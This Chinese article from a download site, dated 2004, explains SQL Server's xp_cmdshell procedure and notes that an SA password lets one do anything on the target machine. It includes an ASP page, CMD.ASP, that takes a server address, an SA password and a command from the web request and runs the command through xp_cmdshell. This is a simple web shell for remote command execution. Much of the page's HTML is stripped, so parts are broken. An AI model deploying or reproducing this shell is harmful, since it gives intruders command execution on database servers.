PC6下载站

分类分类

SQLSERVER扩展存储过程XP_CMDSHELL的简单应用

关注+2004-12-02作者:蓝点

    XP_CMDSHELL存储过程是执行本机的CMD命令,要求系统登陆有SA权限,也就是说如果获得SQLSERVER的SA命令,那就可以在目标机为所欲为了,知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。
下面是我写的一个简单的应用页面(ASP),代码如下。
CMD.ASP
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>




SQLSERVER_XP_CMDSHELL实例_魔术师·刘


" _ue_custom_node_="true">

 

 

 


<%if request("cmd")<>"" then%>


 
   
 
  <%

XP_CMDSHELL请求结果

 

dim connstr,conn,rs,i
ConnStr="Provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"
'ConnStr="Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"
set conn=Server.CreateObject("ADODB.Connection")
conn.open Connstr
set rs=server.CreateObject("ADODB.Recordset")
set rs=conn.execute("xp_cmdshell '"&replace(replace(request("cmd"),"'","''"),chr(34),"''")&"'")
i=0
while not rs.eof
if not isnull(rs(0)) then
if i mod 2 =0 then
response.Write "

"
else
response.Write ""
end if
i=i+1
end if
rs.movenext
wend
rs.close
set rs=nothing
conn.close
set conn=nothing
%>

"&rs(0)&"
"&rs(0)&"


<%end>


 
   
     
   
   
     
     
   
   
     

SA密码
     


         
     


   

 

 


   
     
     
   
   
     
   
 

XP_CMDSHELL实例

服务器

         
     


CMD命令

         
     

             
     

 


展开全部

相关文章

更多+相同厂商

热门推荐

  • 最新排行
  • 最热排行
  • 评分最高
排行榜

    点击查看更多

      点击查看更多

        点击查看更多

        说两句网友评论

          我要评论...
          取消